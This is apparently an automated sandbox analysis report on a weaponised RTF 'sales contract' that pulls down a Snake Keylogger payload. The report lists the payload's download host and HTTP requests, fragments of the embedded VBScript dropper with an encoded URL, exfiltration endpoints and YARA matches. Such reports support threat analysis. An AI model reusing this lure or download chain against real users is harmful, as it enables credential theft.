Source: mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: mum.exe, 0000000F.00000002.1283209898.00000000026E8000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1283632776.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1283300680.00000000026E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: mum.exe, 0000000F.00000002.1279955679.00000000008DB000.00000004.00000020.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1280655319.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1279805294.00000000004FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgP
Source: powershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f0705964.xsph.ru
Source: powershell.exe, 00000004.00000002.919533921.0000000003745000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://f0705964.xsph.ru/mum.exe
Source: mum.exe, 00000008.00000002.962351507.0000000002752000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000008.00000002.961051196.00000000026CF000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000002.1281642701.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.995998092.0000000002941000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000013.00000002.993872041.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001A.00000002.1282263272.0000000002691000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1050938955.00000000026F5000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000001D.00000002.1052652810.000000000295C000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 00000022.00000002.1282013934.0000000002691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000004.00000002.914821376.000000000018E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.937210207.000000000027E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mum.exe, 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, mum.exe, 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5C8D69A0-CC71-4B83-AF64-7D30251F3853}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: f0705964.xsph.ru

Source: global traffic	HTTP traffic detected: GET /mum.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: f0705964.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mum.exe HTTP/1.1Host: f0705964.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

System Summary

Malicious sample detected (through community Yara rule)

Source: Revised sales contract for Crosswear.rtf, type: SAMPLE	Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: Revised sales contract for Crosswear.rtf, type: SAMPLE	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000F.00000000.953392254.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.972728123.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: mum.exe PID: 1724, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: mum.exe PID: 2588, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: Enable Editing when opening. 0 Page: I of 2 Words: 19 ,5) N@m 13 ;a 10096 G) FI G) ,, . i
Source: Screenshot number: 16	Screenshot OCR: Enable Editing when opening. ii: ^ Double-click to Activate Contents Package S O I @ 100

Microsoft Office creates scripting files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp .scT			Jump to behavior

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mum[1].exe

Jump to dropped file

Document contains OLE streams with names of living off the land binaries

Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr	Stream path '_1722767287/\x1Ole10Native' : 3N....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT..... ...C:\8jkepaD\DRdtfhgYgeghDp.scT.:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv.......
Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr	Stream path '_1722767365/\x1Ole10Native' : #O....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT.....6...C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp.scT.M....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="bXVtLmV4ZQ==" 'clsyc2..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = ".........E6..-@Rdv....................E6..-@Rdv....................E6..........................E6........"..sdpfkdfhow = "..

Document contains a stream with embedded javascript code

Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr	Stream path '_1722767287/\x1Ole10Native' : Found JS content: 3N....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT..... ...C:\8jkepaD\DRdtfhgYgeghDp.scT.:....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yulkytjtrhtjrkdsarjky ="b
Source: ~WRF{F2385FB8-B924-43C9-BEC5-65FAE5403308}.tmp.0.dr	Stream path '_1722767365/\x1Ole10Native' : Found JS content: #O....DRdtfhgYgeghDp.scT.C:\nsdsTggH\DRdtfhgYgeghDp.scT.....6...C:\Users\user\AppData\Local\Temp\DRdtfhgYgeghDp.scT.M....<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2YwNzA1OTY0LnhzcGgucnUvbXVtLmV4ZQ==" 'clsyc2..yu

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\mum.exe

Jump to dropped file

Found suspicious RTF objects

Source: DRdtfhgYgeghDp.scT

Static RTF information: Object: 0 Offset: 00000959h DRdtfhgYgeghDp.scT

Source: Revised sales contract for Crosswear.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: Revised sales contract for Crosswear.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.0.mum.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.mum.exe.3859130.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.26dfd64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.mum.exe.3878b50.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.mum.exe.3878b50.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.mum.exe.3859130.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.mum.exe.3837910.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.mum.exe.275ac68.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000009.00000002.937156653.0000000000240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: 00000004.00000002.914867466.00000000001FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.915030344.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000004.00000002.914809669.0000000000150000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: 00000012.00000002.962416931.000000000026E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
